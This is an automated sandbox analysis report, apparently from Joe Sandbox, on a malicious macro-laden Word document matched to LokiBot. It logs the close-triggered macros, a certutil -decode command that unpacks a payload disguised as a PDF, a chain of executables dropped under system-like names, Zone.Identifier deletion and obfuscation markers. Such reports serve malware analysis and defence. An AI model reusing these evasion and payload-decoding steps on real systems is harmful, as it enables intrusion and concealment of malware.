Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Code function: 12_2_004F1C70 12_2_004F1C70
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Code function: 12_2_004F65E0 12_2_004F65E0
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Code function: 12_2_004F78B0 12_2_004F78B0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Code function: 13_2_00291C70 13_2_00291C70
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Code function: 13_2_002978B0 13_2_002978B0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Code function: 13_2_002965E0 13_2_002965E0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Code function: 14_2_01C665E0 14_2_01C665E0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Code function: 14_2_01C678B0 14_2_01C678B0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Code function: 14_2_01C61C70 14_2_01C61C70
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Code function: 15_2_003F1C70 15_2_003F1C70
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Code function: 15_2_003F78B0 15_2_003F78B0
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Code function: 15_2_003F65E0 15_2_003F65E0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_00471C70 16_2_00471C70
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_004765E0 16_2_004765E0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_004778B0 16_2_004778B0
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: sample1.doc OLE, VBA macro line: Private Sub Document_Close()
Source: sample1.doc OLE, VBA macro line: Form_Close
Source: sample1.doc OLE, VBA macro line: Private Sub Form_Close()
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function Document_Close Name: Document_Close
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function Form_Close Name: Form_Close
Document contains embedded VBA macros
Source: sample1.doc OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\Public\Ksh1.pdf FB07F875DC45E6045735513E75A83C50C78154851BD23A645D43EA853E6800AC
Yara signature match
Source: 00000006.00000002.2250987083.000000000061D000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: tmp_e473b4.exe, 00000008.00000002.2255365676.000000000042A000.00000004.00020000.sdmp, normaliz.exe, 00000009.00000002.2261025209.000000000042A000.00000004.00020000.sdmp, mmcshext.exe, 0000000A.00000002.2265147822.000000000042A000.00000004.00020000.sdmp, ir50_qcx.exe, 0000000B.00000002.2269487904.000000000042A000.00000004.00020000.sdmp, dhcpcmonitor.exe, 0000000C.00000002.2273981722.000000000042A000.00000004.00020000.sdmp Binary or memory string: @*\AC:\aseb\Aseb.vbp
Source: tmp_e473b4.exe, normaliz.exe, 00000009.00000000.2254785009.0000000000401000.00000020.00020000.sdmp, mmcshext.exe, 0000000A.00000002.2265125370.0000000000401000.00000020.00020000.sdmp, ir50_qcx.exe, 0000000B.00000002.2269466325.0000000000401000.00000020.00020000.sdmp, dhcpcmonitor.exe, 0000000C.00000002.2273952639.0000000000401000.00000020.00020000.sdmp Binary or memory string: B*\AC:\aseb\Aseb.vbp
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@20/19@0/100
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle, 8_2_00648970
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle, 9_2_003F8970
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Code function: OpenSCManagerW,OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle, 10_2_003F8970
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle, 11_2_00338970
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle, 12_2_004F8970
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle, 13_2_00298970
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle, 14_2_01C68970
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle, 15_2_003F8970
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Code function: 16_2_00474C80 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,CloseHandle,CloseHandle, 16_2_00474C80
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00645040 ChangeServiceConfig2W,OpenServiceW,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree, 8_2_00645040
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$ample1.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRB76C.tmp
Source: sample1.doc OLE indicator, Word Document stream: true
Source: sample1.doc OLE document summary: title field not present or empty
Source: C:\Windows\System32\certutil.exe Console Write: Input Length = 595972
Source: C:\Windows\System32\certutil.exe Console Write: Output Length = 446976
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\certutil.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: sample1.doc Virustotal: Detection: 57%
Source: sample1.doc Metadefender: Detection: 45%
Source: sample1.doc ReversingLabs: Detection: 68%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\certutil.exe Certutil -decode C:\Users\Public\Ksh1.xls C:\Users\Public\Ksh1.pdf
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe C:\Users\user\AppData\Local\Temp/tmp_e473b4.exe
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process created: C:\Windows\SysWOW64\mfcm140\normaliz.exe C:\Windows\SysWOW64\mfcm140\normaliz.exe
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process created: C:\Windows\SysWOW64\clip\mmcshext.exe C:\Windows\SysWOW64\clip\mmcshext.exe
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process created: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe C:\Windows\SysWOW64\regedt32\ir50_qcx.exe
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process created: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process created: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process created: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe C:\Windows\SysWOW64\oleaccrc\TSChannel.exe
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process created: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe C:\Windows\SysWOW64\iprtrmgr\qdvd.exe
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process created: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process created: C:\Windows\SysWOW64\mfcm140\normaliz.exe C:\Windows\SysWOW64\mfcm140\normaliz.exe
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process created: C:\Windows\SysWOW64\clip\mmcshext.exe C:\Windows\SysWOW64\clip\mmcshext.exe
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process created: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe C:\Windows\SysWOW64\regedt32\ir50_qcx.exe
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process created: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process created: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Process created: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe C:\Windows\SysWOW64\oleaccrc\TSChannel.exe
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Process created: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe C:\Windows\SysWOW64\iprtrmgr\qdvd.exe
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Process created: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00404803 push ecx; iretd 8_2_004047EF
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00404021 push ecx; retf 8_2_00404037
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00408839 push esi; iretd 8_2_00408893
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_0040610E push ecx; retf 8_2_0040611B
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_0040A12E push ecx; iretd 8_2_0040A12F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_004031D1 push ecx; iretd 8_2_00403233
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_0040721C pushad ; iretd 8_2_00407223
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_0040321E push ecx; iretd 8_2_00403233
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00403236 push ecx; iretd 8_2_00403287
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00405AE2 push ecx; ret 8_2_00405B3F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_004062F6 push ebx; iretd 8_2_004062F7
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_0040AAF9 push esp; retf 8_2_0040AB17
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00403B4E push ecx; retf 8_2_00403B4F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00404B02 push ecx; ret 8_2_00404B03
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00403B35 push ecx; retf 8_2_00403B47
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_004053DD push ecx; ret 8_2_004053E7
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00408464 push ecx; ret 8_2_0040847B
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00407C76 push ebp; retf 8_2_00407C78
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_0040A404 push ecx; ret 8_2_0040A497
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_004074C5 push ecx; iretd 8_2_004074CF
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_004044D5 push ecx; iretd 8_2_004044F3
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_004054B6 push ecx; retf 8_2_004054B7
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_0040450F push ecx; retf 8_2_00404523
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00404539 push ecx; retf 8_2_00404523
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00406DA8 push eax; retf 8_2_00406FAF
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_0040A646 push edx; iretd 8_2_0040A647
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00403E52 push eax; ret 8_2_00403E54
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00405655 push ecx; retf 8_2_0040565F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00407E7E push ecx; iretd 8_2_00407E7F
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_00409E0A push ecx; ret 8_2_00409E0B
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Code function: 8_2_0040869A push ecx; retf 8_2_0040869B

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::create
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe Executable created and started: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe Executable created and started: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe Executable created and started: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Executable created and started: C:\Windows\SysWOW64\clip\mmcshext.exe
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Executable created and started: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Executable created and started: C:\Windows\SysWOW64\mfcm140\normaliz.exe
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Executable created and started: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Executable created and started: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe
Drops PE files
Source: C:\Windows\System32\certutil.exe File created: C:\Users\Public\Ksh1.pdf
Drops PE files to the user directory
Source: C:\Windows\System32\certutil.exe File created: C:\Users\Public\Ksh1.pdf
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\certutil.exe File created: C:\Users\Public\Ksh1.pdf

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\System32\certutil.exe File created: C:\Users\Public\Ksh1.pdf

Hooking and other Techniques for Hiding and Protection:

Creates and opens a fake document (probably a fake document to hide exploiting)
Source: unknown Process created: cmd line: ksh1.pdf
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe File opened: C:\Windows\SysWOW64\mfcm140\normaliz.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe File opened: C:\Windows\SysWOW64\clip\mmcshext.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\clip\mmcshext.exe File opened: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe File opened: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe File opened: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe File opened: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe File opened: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe File opened: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
